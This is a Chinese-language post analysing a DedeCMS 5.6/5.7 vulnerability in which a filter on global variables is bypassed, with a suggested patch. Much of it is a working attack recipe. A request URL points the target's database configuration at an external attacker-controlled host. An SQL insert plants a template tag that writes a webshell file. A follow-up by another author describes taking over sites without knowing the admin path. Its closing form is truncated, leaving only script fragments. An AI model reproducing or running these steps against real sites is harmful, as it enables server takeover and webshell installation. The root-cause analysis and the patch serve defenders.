PHP等语言SQL注入的问题

soyizi

漏洞不是我发的，这里仅仅只是分析这个漏洞的成因　　
    今天看到微博看到dedecms出洞了，上土司看了一下，同一个问题，暂时公布的有2个位置，
　　
dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
　　
    上面这个是知道后台地址的利用方式
　　
    另一种如下，下本地装一个dede，执行一下语句，很简单，写了一个dedetag，生成shell的
　　
SQL 语句：
　　
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
　　
    再用构造的表单提交数据库信息到plus/mytag_js.php?aid=1，覆盖掉数据库的全局参数，导致目标站的mysql类链接到***构造的mysql数据库，shell 在同目录下 1.php
　　
    分析下mytag_js.php，一开始引用了配置文件，跟进去看看：
　　
require_once(dirname(__FILE__).'/../include/common.inc.php');
　　
    会发现下面代码：
　　
以下是引用片段：
　　
if (!defined('DEDEREQUEST'))
　　
{
　　
    //检查和注册外部提交的变量
　　
    foreach($_REQUEST as $_k=>$_v)//这里是关键，
　　
    {
　　
        if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS)/',$_k) )//这里是关键，
　　
        {//如果键名中有cfg_或GLOBALS,就退出了
　　
            exit('Request var not allow!');
　　
        }
　　
    }
　　
    foreach(Array('_GET','_POST','_COOKIE') as $_request)
　　
    {
　　
        foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);//addslashes过滤的
　　
    }
　　
}
　　
    上面这个套路过滤了引号之类的注入问题，变量覆盖虽有过滤，但是没过滤完全，被多维数组绕过了，
　　
    如_COOKIE[GLOBALS][cfg_dbuser]这个变量，foreach($_REQUEST as $_k=>$_v)之后，这个$k变成_COOKIE，从而绕过了过滤
　　
    $v变成了[GLOBALS][cfg_dbuser]，从而覆盖了data/common.inc.php中的数据库配置变量，
　　
    测试5.6 ，5.7都存在，用dedecms的站非常多，这次估计得悲剧一大片。
　　
    修补的方法官方论坛有位斑竹给出了代码，如下
　　
    找到include/common.inc.php文件
　　
    找到
　　
foreach($_REQUEST as $_k=>$_v)
　　
{
　　
if( strlen($_k)>0 && eregi('^(cfg_|GLOBALS)',$_k) )
　　
{
　　
  exit('Request var not allow!');
　　
}
　　
}
　　
    替换为下面的代码：
　　
function CheckRequest(&$val) {
　　
        if (is_array($val)) {
　　
            foreach ($val as $_k=>$_v) {
　　
                CheckRequest($_k);
　　
                CheckRequest($val[$_k]);
　　
            }
　　
        } else
　　
        {
　　
            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
　　
            {
　　
                exit('Request var not allow!');
　　
            }
　　
        }
　　
    }
　　
CheckRequest($_REQUEST);
　　
------------------------------------------------------------------------------------------------
　　
    By：jannock
　　
    漏洞细节已经传遍了（http://www.t00ls.net/thread-17354-1-1.html，http://lcx.cc/?FoxNews=1681.html），又没得玩了。
　　
    网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell。
　　
    前题条件，必须准备好自己的dede数据库，然后插入数据：
　　
以下是引用片段：
　　
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
　　
    再用下面表单提交，shell 就在同目录下  1.php。原理自己研究。。。
　　
以下是引用片段：
　　

　　

　　

　　

　　

　　

　　

　　

　　

　　

　　

　　
function addaction()
　　
{
　　
document.QuickSearch.action=document.QuickSearch.doaction.value;
　　
}